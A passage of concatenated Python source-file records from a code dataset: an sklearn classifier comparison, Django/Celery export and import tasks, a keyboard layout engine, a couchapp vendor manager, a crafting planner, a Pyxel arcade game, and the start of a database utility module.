import SVC\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn import svm\r\nfrom sklearn import metrics\r\nimport numpy as np\r\nfrom sklearn import linear_model\r\nfrom sklearn import svm\r\nfrom sklearn import preprocessing\r\nfrom sklearn import utils\r\n\r\n\r\nlab_enc = preprocessing.LabelEncoder()\r\ny_train_encoded = lab_enc.fit_transform(y_train)\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)\r\n\r\nclassifiers = {\r\n 'SVR':svm.SVR(),\r\n\t'SVC':SVC(),\r\n 'SGD':linear_model.SGDRegressor(),\r\n 'BAYES':linear_model.BayesianRidge(),\r\n 'LL':linear_model.LassoLars(),\r\n 'ARD':linear_model.ARDRegression(),\r\n 'PA':linear_model.PassiveAggressiveRegressor(),\r\n 'TS':linear_model.TheilSenRegressor(),\r\n 'L':linear_model.LinearRegression()\r\n\t}\r\n\r\ntrain_scores = []\r\n\r\ntest_scores = []\r\nnames = []\r\nmodels = {}\r\nfor key in classifiers.keys(): \r\n clf = classifiers[key]\r\n clf.fit(X_train, y_train)\r\n train_score = clf.score(X_train, y_train)\r\n test_score = clf.score(X_test, y_test)\r\n y_test_predict = clf.predict(X_test)\r\n train_scores.append(train_score)\r\n test_scores.append(test_score)\r\n names.append(key)\r\n\r\nmodels['train_score'] = train_scores\r\n\r\nmodels['test_score'] = test_scores\r\nmodels['model'] = names\r\ndf_models = pd.DataFrame(models)\r\ndf_models.to_csv('models.csv')\r\n\r\n\r\nmodel_names = []\r\nbest_scores = []\r\nbest_models = []\r\n\r\nfor key in classifiers.keys(): \r\n try:\r\n clf = classifiers[key]\r\n parameters = {'kernel':('linear', 'rbf'), 'C':(0.1, 1,5, 10)}\r\n gs = GridSearchCV(clf, parameters)\r\n gs.fit(X_train, y_train)\r\n best_scores.append(gs.best_score_)\r\n best_models.append(gs.best_params_)\r\n model_names.append(key)\r\n except:\r\n continue\r\n\r\nbest = {}\r\nbest['name'] = model_names\r\nbest['score'] = best_scores\r\nbest['param'] = best_models\r\ndf_best = pd.DataFrame(best)\r\ndf_best.to_csv('best.csv')\r\n\r\nparameters = {'kernel':('linear', 'rbf'), 'C':(0.1,0.5,0.8, 1,1.2,1.5,2,5, 10)}\r\ngs = GridSearchCV(SVC(), parameters)\r\ngs.fit(X_train, y_train)\r\ndf_gs=pd.DataFrame(gs.cv_results_)\r\ndf_gs.to_csv('best2.csv')\r\ngs.score(X_test,y_test)\r\n\t","sub_path":"code of 4D-Intelli/FOMC_analysis_single minutes interval, LSA for bow.py","file_name":"FOMC_analysis_single minutes interval, LSA for bow.py","file_ext":"py","file_size_in_byte":13012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"160274119","text":"from smtplib import SMTPException\r\n\r\nimport pandas as pd\r\nfrom celery import shared_task\r\nfrom django.conf import settings\r\nfrom django.core.cache import cache\r\nfrom django.core.files.storage import default_storage\r\nfrom django.core.mail import EmailMessage\r\nfrom django.utils import timezone\r\n\r\nfrom course_flow import export_functions, import_functions\r\nfrom course_flow import redux_actions as actions\r\n\r\nfrom .celery import logger, try_async\r\nfrom .models import ObjectSet, User\r\nfrom .utils import dateTimeFormatNoSpace, get_model_from_str\r\n\r\n\r\n@try_async\r\n@shared_task\r\ndef async_send_export_email(\r\n user_email,\r\n pk,\r\n object_type,\r\n export_type,\r\n export_format,\r\n allowed_sets,\r\n email_subject,\r\n email_text,\r\n):\r\n model_object = get_model_from_str(object_type).objects.get(pk=pk)\r\n if object_type == \"project\":\r\n project_sets = ObjectSet.objects.filter(project=model_object)\r\n else:\r\n project_sets = ObjectSet.objects.filter(\r\n project=model_object.get_project()\r\n )\r\n allowed_sets = project_sets.filter(id__in=allowed_sets)\r\n if export_type == \"outcome\":\r\n file = export_functions.get_outcomes_export(\r\n model_object, object_type, export_format, allowed_sets\r\n )\r\n elif export_type == \"framework\":\r\n file = export_functions.get_course_frameworks_export(\r\n model_object, object_type, export_format, allowed_sets\r\n )\r\n elif export_type == \"matrix\":\r\n file = export_functions.get_program_matrix_export(\r\n model_object, object_type, export_format, allowed_sets\r\n )\r\n elif export_type == \"node\":\r\n file = export_functions.get_nodes_export(\r\n model_object, object_type, export_format, allowed_sets\r\n )\r\n if export_format == \"excel\":\r\n file_ext = \"xlsx\"\r\n elif export_format == \"csv\":\r\n file_ext = \"csv\"\r\n\r\n filename = (\r\n object_type\r\n + \"_\"\r\n + str(pk)\r\n + \"_\"\r\n + export_type\r\n + \"_\"\r\n + timezone.now().strftime(dateTimeFormatNoSpace())\r\n + \".\"\r\n + file_ext\r\n )\r\n email = EmailMessage(\r\n email_subject,\r\n email_text,\r\n settings.DEFAULT_FROM_EMAIL,\r\n [user_email],\r\n )\r\n if export_format == \"csv\":\r\n file_data = \"text/csv\"\r\n elif export_format == \"excel\":\r\n file_data = (\r\n \"application/vnd.openxmlformats-officedocument.spreadsheetml.sheet\"\r\n )\r\n if settings.DEBUG:\r\n with open(\"last_export.\" + file_ext, \"wb\") as out_file:\r\n out_file.write(file)\r\n\r\n email.attach(\r\n filename,\r\n file,\r\n file_data,\r\n )\r\n try:\r\n email.send()\r\n logger.info(\r\n f\"Email - {email_subject} - {filename} - sent to {user_email}\"\r\n )\r\n except SMTPException:\r\n logger.info(\r\n f\"Email - {email_subject} - {filename} - could NOT be sent to {user_email}\"\r\n )\r\n\r\n\r\n@try_async\r\n@shared_task\r\ndef async_import_file_data(pk, object_type, task_type, file_json, user_id):\r\n model_object = get_model_from_str(object_type).objects.get(pk=pk)\r\n user = User.objects.get(pk=user_id)\r\n if object_type == \"workflow\":\r\n actions.dispatch_wf(\r\n model_object,\r\n actions.changeField(pk, \"workflow\", {\"importing\": True}, False),\r\n )\r\n cache.set(object_type + str(pk) + \"importing\", True, 300)\r\n df = pd.read_json(file_json)\r\n try:\r\n if task_type == \"outcomes\":\r\n import_functions.import_outcomes(df, model_object, user)\r\n if task_type == \"nodes\":\r\n import_functions.import_nodes(df, model_object, user)\r\n except Exception:\r\n pass\r\n cache.delete(object_type + str(pk) + \"importing\")\r\n if object_type == \"workflow\":\r\n actions.dispatch_wf(\r\n model_object,\r\n actions.changeField(pk, \"workflow\", {\"importing\": False}, False),\r\n )\r\n","sub_path":"course_flow/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"278645599","text":"import json\n\nclass KeyboardLayoutEngine:\n def __init__(self):\n self.layout=[]\n self.properties={}\n self.pitch=19.05\n\n def load_layout_from_file(self, filename):\n with open(filename) as fp:\n self.raw_data=json.load(fp)\n\n # Weed out the key layout data from the other properties\n for line in self.raw_data:\n if isinstance(line, dict):\n self.properties.update(line)\n else:\n self.layout.append(line)\n \n def layout_switches(self):\n centre_y=0.0\n switches=[]\n xmin=xmax=ymin=ymax=0.0\n for row, row_data in enumerate(self.layout):\n centre_x=0.0\n next_height = next_width = 1.0\n next_x_offset = next_y_offset = 0.0\n col=0\n for col, key in enumerate(row_data):\n width=next_width\n height=next_height\n if col==0 and row>0:\n centre_y+=1.0\n if isinstance(key, dict):\n if 'x' in key:\n centre_x+=key['x']\n if 'y' in key:\n centre_y+=key['y']\n if 'w' in key:\n next_width=key['w']\n if 'h' in key:\n next_height=key['h']\n if 'x2' in key:\n next_x_offset=key['x2']\n if 'y2' in key:\n next_y_offset=key['y2']\n else:\n x=(centre_x + (width-1)/2 + next_x_offset)*self.pitch\n y=(centre_y + (height-1)/2 + next_y_offset)*self.pitch\n sw={'label': key, 'x': x, 'y': y, 'row': row, 'col': col, 'rot': 0.0}\n switches.append(sw)\n centre_x+=width\n next_width=1.0\n next_height=1.0\n next_x_offset=0.0\n next_y_offset=0.0\n xmin=min(xmin, x-width/2)\n ymin=min(ymin, y-height/2)\n xmax=max(xmax, x+width/2)\n ymax=max(ymax,y+height/2)\n return switches, (xmin*self.pitch, xmax*self.pitch, ymin*self.pitch, ymax*self.pitch)\n","sub_path":"keyboard/layoutengine.py","file_name":"layoutengine.py","file_ext":"py","file_size_in_byte":2283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"81301050","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2009 Benoit Chesneau \n#\n# This software is licensed as described in the file LICENSE, which\n# you should have received as part of this distribution.\n#\n\nimport os\nimport sys\n\nfrom couchapp.errors import VendorError\nfrom couchapp.utils import *\n\n__all__ = ['VENDOR_HANDLERS', 'Vendor']\n\nCOUCHAPP_VENDOR_URL = 'git://github.com/couchapp/couchapp.git'\nCOUCHAPP_VENDOR_SCM = 'git'\n\nclass Vendor(object):\n \"\"\" Vendor object to manage vendors in a couchapp \"\"\"\n \n def __init__(self, app_dir, ui):\n \"\"\" Constructor of vendor object \n \n :attr app_dir: string, path of app_dir\n \"\"\"\n vendor_dir = os.path.join(app_dir, \"vendor\")\n if not os.path.isdir(vendor_dir):\n os.makedirs(vendor_dir)\n self.vendor_dir = vendor_dir\n self.ui = ui\n self._vendor_handlers = None\n \n def global_vendor_handlers(self):\n return {\n 'git': 'couchapp.vendor_handlers.git'\n }\n \n def vendor_handlers(self):\n if self._vendor_handlers is None:\n self._vendor_handlers = {}\n handlers = self.global_vendor_handlers()\n if \"vendor_handlers\" in self.ui.conf:\n try:\n handlers.update(self.ui.conf['vendor_handlers'])\n except ValueError:\n pass\n \n for handler_name, mod_name in handlers.items():\n mod = __import__(mod_name, {}, {}, [''])\n if not hasattr(mod, 'cmdtable'):\n continue\n cmdtable = getattr(mod, 'cmdtable')\n self._vendor_handlers[handler_name] = cmdtable\n\n return self._vendor_handlers\n \n def get_vendors(self):\n \"\"\" get list of vendors\n \n :return: list, vendor names\n \"\"\"\n \n vendors = []\n for name in self.ui.listdir(self.vendor_dir):\n current_path = self.ui.rjoin(self.vendor_dir, name)\n if self.ui.isdir(current_path):\n vendors.append(name)\n return vendors\n \n def install(self, url, scm=\"git\"):\n \"\"\" install a vendor in the couchapp dir.\n \n :attr url: string, url to retrieve vendor\n :attr scm: string, name of scm used to retrieve vendor. Default scm\n is git. You could add scm in ~/.couchapprc like this in `vendor_handlers`\n property :\n \n .. code-block:: javascript\n {\n \"vendor_handlers\": {\n \"scm\": \"module\"\n }\n }\n \n a vendor module receive 2 actions `install` and `update` and take differents arguments:\n * install :\n \n def install(ui, url, vendor_dir):\n ....\n\n * update :\n \n def update(ui, url, path, vendor_dir):\n ....\n \n Errors should be returned to stderr. When installing the script should create a file named\n `.new` with url used to retrieve the vendor as first line.\n \n :attr verbose: boolean, False by default\n \n \"\"\"\n if not scm in self.vendor_handlers():\n raise VendorError(\"%s scm isn't supported yet.\" % scm)\n \n # get list of installed vendors\n installed = self.get_vendors()\n \n handler = self.vendor_handlers()[scm]\n handler['install'](self.ui, url, self.vendor_dir)\n \n # detect new vendor application and add url so we could update later\n for name in self.ui.listdir(self.vendor_dir):\n current_path = self.ui.rjoin(self.vendor_dir, name)\n if self.ui.isdir(current_path) and name not in installed:\n new_file = self.ui.rjoin(current_path, '.new')\n if self.ui.isfile(new_file):\n new_url = self.ui.read(new_file).strip()\n if new_url == url:\n mfile = self.ui.rjoin(current_path, 'metadata.json')\n self.ui.write_json(mfile, {\n \"scm\": scm,\n \"update_url\": url\n })\n self.ui.unlink(new_file)\n return\n \n def _update(self, name):\n current_path = self.ui.rjoin(self.vendor_dir, name)\n if self.ui.isdir(current_path):\n mfile = self.ui.rjoin(current_path, 'metadata.json')\n metadata = self.ui.read_json(mfile)\n if not metadata and name == 'couchapp':\n update_url = COUCHAPP_VENDOR_URL\n scm = COUCHAPP_VENDOR_SCM\n elif metadata:\n update_url = metadata['update_url']\n scm = metadata['scm']\n if not scm in self.vendor_handlers():\n scm = False\n \n if update_url and scm:\n # for now we manage only internal handlers\n handler = self.vendor_handlers()[scm]\n if self.ui.verbose >= 1:\n self.ui.logger.info(\"Updating %s from %s\" % (\n current_path, update_url)) \n handler['update'](self.ui, update_url, current_path, self.vendor_dir) \n \n def update(self, name=None): \n \"\"\"\n update vendor or all vendors if name is None\n \n :attr name: string, name of vendor\n :attr verbose: boolean, False by default\n \"\"\"\n multiple = isinstance(name, (list, tuple,))\n for vendor_name in self.ui.listdir(self.vendor_dir):\n if (multiple and vendor_name in name) or name is None:\n self._update(vendor_name)\n elif name and vendor_name == name:\n self._update(vendor_name)\n break","sub_path":"src/couchapp/vendor.py","file_name":"vendor.py","file_ext":"py","file_size_in_byte":5970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"280062436","text":"from collections import namedtuple\nfrom heapq import heappop, heappush\nimport json\n\ndef make_checker(rule, items):\n consumes = ()\n requirements = ()\n\n if rule.get(\"Consumes\") != None:\n consumes = itemsToTuple(rule[\"Consumes\"], items)\n\n if rule.get(\"Requires\") != None:\n requirements = itemsToTuple(rule[\"Requires\"], items)\n\n def check(state):\n if contains(state, requirements) == False:\n return False\n\n if contains(state, consumes) == False:\n return False\n\n return True\n\n return check\n\ndef make_effector(rule, items):\n consumes = ()\n produces = ()\n\n if rule.get(\"Consumes\") != None:\n consumes = itemsToTuple(rule[\"Consumes\"], items)\n\n if rule.get(\"Produces\") != None:\n produces = itemsToTuple(rule[\"Produces\"], items)\n\n def effect(state):\n nextState = state;\n\n if consumes != () and nextState != ():\n nextState = combineTuple(nextState, consumes, \"sub\")\n\n if produces != () and nextState != ():\n nextState = combineTuple(nextState, produces, \"add\")\n\n return nextState\n\n return effect\n\ndef heuristic(node, nextNode, bases):\n cost = 0\n\n if nextNode != () and bases != ():\n for i, amount in enumerate(bases):\n if nextNode[i] >= amount:\n cost += 1000\n\n for i in xrange(len(node)):\n if node[i] >= nextNode[i] and node[i] != 0 and nextNode[i] != 0:\n cost -= 1\n\n # bench\n if nextNode[0] > 1:\n cost += float(\"inf\")\n\n # furnace\n if nextNode[4] > 1:\n cost += float(\"inf\")\n\n # iron_axe\n if nextNode[6] > 1:\n cost += float(\"inf\")\n\n # iron_pickaxe\n if nextNode[7] > 1:\n cost += float(\"inf\")\n\n # stone_axe\n if nextNode[12] > 1:\n cost += float(\"inf\")\n\n # stone_pickaxe\n if nextNode[13] > 1:\n cost += float(\"inf\")\n\n # wooden_axe\n if nextNode[15] > 1:\n cost += float(\"inf\")\n\n # wooden_pickaxe\n if nextNode[16] > 1:\n cost += float(\"inf\")\n\n # coal\n if nextNode[2] > 1:\n cost += float(\"inf\")\n\n # cobble\n if nextNode[3] > 8:\n cost += float(\"inf\")\n\n # ingot\n if nextNode[5] > 6:\n cost += float(\"inf\")\n\n # ore\n if nextNode[8] > 1:\n cost += float(\"inf\")\n\n # plank\n if nextNode[9] > 4:\n cost += 1\n\n # stick\n if nextNode[11] > 8:\n cost += float(\"inf\")\n\n # wood\n if nextNode[14] > 1:\n cost += float(\"inf\")\n\n return cost\n\ndef graph(state, recipes):\n adjacent = []\n\n for recipe in recipes:\n if recipe.check(state):\n adjacent.append((recipe.cost, recipe.effect(state), recipe.name))\n\n return adjacent\n\n\ndef plan(graph, state, items, goals, recipes, bases):\n dist = {}\n prev = {}\n name = {}\n initial = itemsToTuple(state, items)\n goal = itemsToTuple(goals, items)\n dist[initial] = 0\n prev[initial] = None\n name[initial] = \"initial\"\n heap = [(dist[initial], initial, name[initial])]\n\n while heap:\n node = heappop(heap)\n\n if contains(node[1], goal):\n break\n\n for nextNode in graph(node[1], recipes):\n distance = nextNode[0] + dist[node[1]]\n\n if nextNode[1] not in dist or distance < dist[nextNode[1]]:\n dist[nextNode[1]] = distance\n prev[nextNode[1]] = node[1]\n name[nextNode[1]] = nextNode[2]\n cost = dist[nextNode[1]] + heuristic(node[1], nextNode[1], bases)\n heappush(heap, (cost, nextNode[1], nextNode[2]))\n\n path = []\n\n if contains(node[1], goal):\n node = node[1]\n\n while node:\n path.append((name[node], dist[node]))\n node = prev[node]\n\n path.reverse()\n\n for i in xrange(len(path)):\n print(path[i])\n\n print(\"Length: \" + str(len(path) - 1))\n\ndef itemsToTuple(inventory, items):\n return tuple(int(inventory.get(name, 0)) for i, name in enumerate(items))\n\ndef make_recipes(recipes, items):\n Recipe = namedtuple(\"Recipe\", [\"name\", \"check\", \"effect\", \"cost\"])\n allRecipes = []\n\n for name, rule in recipes.items():\n checker = make_checker(rule, items)\n effector = make_effector(rule, items)\n recipe = Recipe(name, checker, effector, rule[\"Time\"])\n allRecipes.append(recipe)\n\n return allRecipes\n\ndef contains(have, want):\n if have != () and want != ():\n for i, amount in enumerate(want):\n if have[i] < amount:\n return False\n\n return True\n\ndef combineTuple(firstTuple, secondTuple, operator):\n if operator == \"add\":\n return tuple(firstTuple[i] + amount for i, amount in enumerate(secondTuple))\n elif operator == \"sub\":\n return tuple(firstTuple[i] - amount for i, amount in enumerate(secondTuple))\n\ndef findBase(state, goals, recipes, items, iterations):\n goalList = []\n\n for i, name in enumerate(goals):\n goalList.append(name)\n\n consumes = tuple(0 for i in xrange(len(state)))\n\n depth = 0\n\n while goalList and depth < iterations:\n currentGoal = goalList.pop()\n\n for index, name in enumerate(recipes):\n if recipes[name][\"Produces\"].get(currentGoal) != None:\n if recipes[name].get(\"Consumes\") != None:\n requirements = itemsToTuple(recipes[name][\"Consumes\"], items)\n consumes = combineTuple(consumes, requirements, \"add\")\n\n for i, item in enumerate(recipes[name][\"Consumes\"]):\n goalList.append(item)\n\n if recipes[name].get(\"Requires\") != None:\n requirements = itemsToTuple(recipes[name][\"Requires\"], items)\n consumes = combineTuple(consumes, requirements, \"add\")\n\n for i, item in enumerate(recipes[name][\"Requires\"]):\n goalList.append(item)\n\n depth += 1\n\n return consumes\n\n\ndef planner(inputFile):\n with open(inputFile) as f:\n Crafting = json.load(f)\n\n inventory = Crafting[\"Initial\"]\n items = Crafting[\"Items\"]\n goals = Crafting[\"Goal\"]\n recipes = make_recipes(Crafting[\"Recipes\"], items)\n bases = findBase(itemsToTuple(inventory, items), goals, Crafting[\"Recipes\"], items, 5)\n print(bases)\n\n plan(graph, inventory, items, goals, recipes, bases)\n\nif __name__ == \"__main__\":\n import sys\n _, filename = sys.argv\n planner(filename)\n","sub_path":"p5/p5_planner.py","file_name":"p5_planner.py","file_ext":"py","file_size_in_byte":6444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"11630490","text":"import pyxel\nimport random\n\nDisplayWidth = 160\nDisplayHeight = 120\nTILE_SIZE = 8\nTEXT_HEIGHT = 5\nTEXT_WIDTH = 3\n\nclass Obj():\n\t\"\"\"docstring for Obj.\"\"\"\n\n\tdef __init__(self):\n\t\tself.x = 0\n\t\tself.y = 0\n\t\tself.height = TILE_SIZE\n\t\tself.width = TILE_SIZE\n\t\tself._setTile(0,0)\n\n\tdef _setTile(self, x, y):\n\t\tself.tileX = x\n\t\tself.tileY = y\n\n\tdef draw(self):\n\t\ttransClr = 2\n\t\tpyxel.blt(\n\t\t\tself.x, self.y,\n\t\t\t0,\n\t\t\tself.tileX, self.tileY,\n\t\t\tTILE_SIZE, TILE_SIZE, transClr)\n\n\nclass Charactor(Obj):\n\t\"\"\"docstring for Charactor.\"\"\"\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.y = DisplayHeight-TILE_SIZE*2\n\t\tself.height = TILE_SIZE-1\n\t\tself.width = TILE_SIZE-1\n\t\tself._setTile(0, 16)\n\t\tself.SPEED = 2\n\n\t\tself.death = False\n\n\tdef update(self):\n\t\tprevY = self.y\n\t\tGRAVITY = 1\n\n\t\tif not pyxel.btn(pyxel.KEY_SPACE):\n\t\t\t# USUAL\n\n\t\t\tif pyxel.btn(pyxel.KEY_UP):\n\t\t\t\tif self.y > DisplayHeight-TILE_SIZE*4:\n\t\t\t\t\tself.y -= GRAVITY + 2\n\t\t\t\telse:\n\t\t\t\t\tself.y = DisplayHeight-TILE_SIZE*4\n\t\t\t\t\t# anti gravity\n\t\t\t\t\tself.y -= GRAVITY\n\n\t\t\t# if upper then floor\n\t\t\tif self.y+self.width-1 < DisplayHeight-TILE_SIZE -1:\n\t\t\t\t# gravity\n\t\t\t\tself.y += GRAVITY\n\n\t\t\tif pyxel.btn(pyxel.KEY_LEFT):\n\t\t\t\tself.x = max( self.x-self.SPEED, 0 )\n\n\t\t\telif pyxel.btn(pyxel.KEY_RIGHT):\n\t\t\t\tself.x = min( self.x+self.SPEED, DisplayWidth-TILE_SIZE )\n\n\t\telse:\n\t\t\t# if press SPACE key\n\n\t\t\tself.y = prevY\n\n\t\t\tif pyxel.btn(pyxel.KEY_UP):\n\t\t\t\tif self.y > DisplayHeight-TILE_SIZE*4:\n\t\t\t\t\tself.y -= 1\n\t\t\telif pyxel.btn(pyxel.KEY_DOWN):\n\t\t\t\tif self.y+self.width-1 < DisplayHeight-TILE_SIZE -1:\n\t\t\t\t\tself.y += 1\n\t\t\t# if pyxel.btn(pyxel.KEY_LEFT):\n\t\t\t# \tself.x -= 1\n\t\t\t# elif pyxel.btn(pyxel.KEY_RIGHT):\n\t\t\t# \tself.x += 1\n\n\tdef collision(self, obj):\n\t\tselfXStart = self.x\n\t\tselfYStart = self.y\n\t\tselfXEnd = self.x+self.width-1\n\t\tselfYEnd = self.y+self.height-1\n\t\tobjXStart = obj.x\n\t\tobjYStart = obj.y\n\t\tobjXEnd = obj.x+obj.width-1\n\t\tobjYEnd = obj.y+obj.height-1\n\n\t\tif selfXEnd >= objXStart and objXEnd >= selfXStart:\n\t\t\tif selfYEnd >= objYStart and objYEnd >= selfYStart:\n\t\t\t\tself.death = True\n\n\nclass Floor(Obj):\n\t\"\"\"docstring for Floor.\"\"\"\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.y = DisplayHeight-TILE_SIZE\n\t\tself._setTile(8, 0)\n\n\tdef draw(self):\n\t\tfor i in range(0, DisplayWidth, TILE_SIZE):\n\t\t\tpyxel.blt(\n\t\t\t\ti, self.y,\n\t\t\t\t0,\n\t\t\t\tself.tileX, self.tileY,\n\t\t\t\tTILE_SIZE, TILE_SIZE)\n\n\nclass Ceiling(Obj):\n\t\"\"\"docstring for Ceiling.\"\"\"\n\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.y = DisplayHeight-TILE_SIZE*5\n\t\tself._setTile(24, 0)\n\n\t\tself.startPoint = 0\n\n\tdef draw(self):\n\t\tfor i in range(self.startPoint, DisplayWidth+TILE_SIZE, TILE_SIZE):\n\t\t\tpyxel.blt(\n\t\t\t\ti, self.y,\n\t\t\t\t0,\n\t\t\t\tself.tileX, self.tileY,\n\t\t\t\tTILE_SIZE, TILE_SIZE)\n\t\tself.startPoint -=1\n\t\tif self.startPoint > TILE_SIZE:\n\t\t\tself.startPoint = 0\n\n\nclass Obstacle(Obj):\n\t\"\"\"docstring for Obstacle.\"\"\"\n\n\tdef __init__(self, high):\n\t\tsuper().__init__()\n\t\tself.x = DisplayWidth-TILE_SIZE\n\t\tself.y = DisplayHeight-TILE_SIZE*(1+high)\n\t\tself._setTile(40, 0)\n\t\tself.SPEED = 1\n\n\tdef update(self):\n\t\tself.x -= self.SPEED\n\n\nclass App:\n\tdef __init__(self):\n\t\t# object\n\t\tself.playerChr = Charactor()\n\t\tself.floor = Floor()\n\t\tself.ceiling = Ceiling()\n\t\tself.obstacles = []\n\n\t\t# valiable\n\t\tself.state = \"start\"\n\t\tself.countFromCreateObs = 255\n\n\t\t# init\n\t\tpyxel.init(DisplayWidth, DisplayHeight, caption=\"Zero One\")\n\t\tpyxel.load(\"assets/assets.pyxres\")\n\t\tpyxel.run(self.update, self.draw)\n\n\tdef update(self):\n\t\t# Quit\n\t\tif pyxel.btnp(pyxel.KEY_Q):\n\t\t\tpyxel.quit()\n\n\t\tif self.state==\"start\":\n\t\t\tif pyxel.btnp(pyxel.KEY_SPACE):\n\t\t\t\tself.state = \"main\"\n\t\telif self.state==\"main\":\n\t\t\tself.updateMain()\n\t\t\tif self.playerChr.death:\n\t\t\t\tself.state = \"gameOver\"\n\t\telif self.state==\"gameOver\":\n\t\t\tif pyxel.btnp(pyxel.KEY_R):\n\t\t\t\tself.playerChr.__init__()\n\t\t\t\tself.obstacles.clear()\n\t\t\t\tself.state = \"main\"\n\n\tdef updateMain(self):\n\t\t# obstacle\n\t\t## create\n\t\t# Ensure space to move player\n\t\tself.countFromCreateObs +=1\n\t\tif self.countFromCreateObs > TILE_SIZE + TILE_SIZE + 10:\n\t\t\t# create or not\n\t\t\trnd = random.random()\n\t\t\tif rnd < 0.05:\n\t\t\t\t# if create\n\t\t\t\t# how many 1or2\n\t\t\t\tnum = random.randint(1,2)\n\t\t\t\tif num==1:\n\t\t\t\t\tplace = random.randint(1,3)\n\t\t\t\t\tself.obstacles.append(Obstacle(place))\n\t\t\t\telif num==2:\n\t\t\t\t\tplace = [1,2,3]\n\t\t\t\t\tplace.remove(random.randint(1,3))\n\t\t\t\t\tfor i in place:\n\t\t\t\t\t\tself.obstacles.append(Obstacle(i))\n\t\t\t\telse:\n\t\t\t\t\tprint(\"ERR\")\n\t\t\t\t\texit(1)\n\t\t\t\tself.countFromCreateObs = 0\n\n\t\t## update & prepare remove\n\t\tobsRm = []\n\t\tfor o in self.obstacles:\n\t\t\tif o.x < 0:\n\t\t\t\tobsRm.append(o)\n\t\t\t\tcontinue\n\n\t\t\t## update\n\t\t\to.update()\n\n\t\t## remove\n\t\tfor o in obsRm:\n\t\t\tself.obstacles.remove(o)\n\n\t\t# player\n\t\tself.playerChr.update()\n\n\t\t## collision\n\t\tfor o in self.obstacles:\n\t\t\tself.playerChr.collision(o)\n\n\tdef draw(self):\n\t\t# background\n\t\tpyxel.cls(7)\n\n\t\tif self.state==\"start\":\n\t\t\tself.printTextCenter(DisplayHeight/2-TEXT_HEIGHT/2-10, \"ZERO ONE\", pyxel.frame_count % 16)\n\t\t\tself.printTextCenter(DisplayHeight/2+TEXT_HEIGHT/2-10+1, \"Press SPACE\", 0)\n\t\t\t# self.printCenter()\n\n\t\telif self.state==\"main\":\n\t\t\tpyxel.text(1,1, \"ARROW KEY : move\\nSPACE : stop\", 0)\n\t\t\tpyxel.text(55, 41, \"Hello, Pyxel!\", pyxel.frame_count % 16)\n\n\t\t\tself.floor.draw()\n\t\t\tself.ceiling.draw()\n\t\t\tfor o in self.obstacles:\n\t\t\t\to.draw()\n\t\t\tself.playerChr.draw()\n\n\t\t\t# # Collision\n\t\t\t# if self.playerChr.death:\n\t\t\t# \tpyxel.text(0, 0, \"HIT!\", 8)\n\t\telif self.state==\"gameOver\":\n\t\t\tself.printTextCenter(DisplayHeight/2-TEXT_HEIGHT/2-10, \"GAME OVER\", 0)\n\t\t\tself.printTextCenter(DisplayHeight/2+TEXT_HEIGHT/2-10+1, \"Press R to RESTART\", 0)\n\n\tdef printTextCenter(self, height, text, col):\n\t\tx = DisplayWidth/2 - len(text)/2*TEXT_WIDTH\n\t\tpyxel.text(x, height, text, col)\n\n\tdef printCenter(self):\n\t\tpyxel.line(DisplayWidth/2,0,DisplayWidth/2,DisplayHeight, 8)\n\t\tpyxel.line(0,DisplayHeight/2,DisplayWidth,DisplayHeight/2, 8)\n\n\nif __name__ == \"__main__\":\n\tApp()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"311295017","text":"#!/usr/bin/env python\n#-*-coding:utf-8-*-\n\n__author__='ctj'\n\n'''\n\t数据库操纵模块,文档测试 >>>后边必须有个空格\n'''\nimport time,uuid,functools,threading,logging\n#reload(sys)\n#sys.setdefaultencoding('utf8')\n\nclass Dict(dict):\n\t'''\n\tSimple dict but support access as x.y style\n\n\t>>> d1 = Dict()\n\t>>> d1['x'] = 100\n\t>>> d1.x\n\t100\n\t>>> d1.y = 200\n\t>>> d1['y']\n\t200\n\t>>> d2 = Dict(a=1,b=2,c='3')\n\t>>> d2.c\n\t'3'\n\t>>> d2['empty']\n\tTraceback (most recent call last):\n\t\t...\n\tKeyError: 'empty'\n\t>>> d2.empty\n\tTraceback (most recent call last):\n\t\t...\n\tAttributeError: 'Dict' object has no attribute 'empty'\n\t>>> d3 = Dict(('a','b','c'),(1,2,3))\n\t>>> d3.a\n\t1\n\t>>> d3.b\n\t2\n\t>>> d3.c\n\t3\n\t'''\n\tdef __init__ (self,names=(),values=(),**kw):\n\t\tsuper(Dict,self).__init__(**kw)\n\t\t'''\n\t\t\tzip()将两个list糅合在一起 例如:\n\t\t\tx=[1,2,3,4,5]\n\t\t\ty=[6,7,8,9,10]\n\t\t\tzip(x,y)-->就得到了[(1,6),(2,7),(3,8),(4,9),(5,10)]\n\t\t'''\n\t\tfor k,v in zip(names,values):\n\t\t\tself[k] = v\n\tdef __getattr__ (self,key):\n\t\ttry:\n\t\t\treturn self[key]\n\t\texcept KeyError:\n\t\t\traise AttributeError(r\"'Dict' object has no attribute '%s'\" % key)\n\tdef __setattr__ (self,key,value):\n\t\tself[key] = value\n\ndef next_id (t=None):\n\t'''\n\tReturn next id as 50-char string\n\t\n\tArgs:\n\t\tt:unix timestamp, default to None and using time.time().\n\t'''\n\tif t is None:\n\t\tt = time.time()\n\t\t'''\n\t\t\t%015d:15位的整型,不够15位,前置补0\n\t\t\tuuid4() make a random UUID 得到一个随机的UUID\n\t\t\t如果没有传入参数根据系统当前时间15位和一个随机得到的UUID 填充3个0 组成一个长度为50的字符串\n\t\t'''\n\treturn '%015d%s000'%(int(t*1000),uuid.uuid4().hex)\n\ndef _profiling (start,sql=''):\n\t\tt = 